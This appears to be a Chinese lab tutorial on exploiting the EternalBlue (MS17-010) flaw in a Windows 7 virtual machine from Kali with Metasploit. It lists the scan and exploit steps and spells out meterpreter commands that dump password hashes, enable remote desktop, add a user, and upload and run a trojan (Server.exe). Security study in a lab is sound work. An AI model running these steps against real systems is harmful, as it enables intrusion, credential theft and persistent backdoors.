有关永恒之蓝的一些操作_怎么用永恒之蓝

一、实验环境
windows 7机器作为靶机存在永恒之蓝的漏洞
 kali linux机器作为攻击机

打开win7的cmd输入ipconfig，查看一下靶机的IP

打开kali的终端，输入ifconfig，查看攻击机的IP

用攻击机去ping靶机

用靶机去ping攻击机

两者都可以互相ping通才可以 

可能会遇到ping不通的情况：

1.看一下防火墙是否关闭

2.看一下虚拟机的网络连接方式是不是都在NAT模式下

二、实验步骤

首先进入到root下：

 1、在msf中找一下msf的脚本

 2、使用ms17-010的辅助性脚本

3、配置ms17-010的辅助性脚本

4、配置完成后，执行ms17-010的辅助性脚本

5、使用ms17-010攻击性模块

6、查看配置项

7、设置被攻击机器ip

8、运行ms17-010攻击模块

9、成功建立会话后，使用一些功能
(1)shell    #直接给一个shell命令执行终端
    exit   #退出shell命令执行终端
(2)sysinfo  #查看靶机信息
(3)ipconfig  #查看靶机网络配置
    ifconfig   #查看靶机网络配置
(4)hashdump  #下载靶机用户的hash
(5)screenshot  #可以对靶机屏幕截图
(6)ps    #查看靶机正在运行的进程
(7) 在meterpreter 界面输入 run getgui -e 开启目标靶机的远程桌面
输入shell，进入shell命令行终端
使用dos命令 net user 去创建一个用户
 (8 )使用upload 上传文件
upload /home/kali/桌面/Server.exe C:\\Windows
上传成功后 进入shell页面
cd 切换到上传目录  
输入木马的名字敲击回车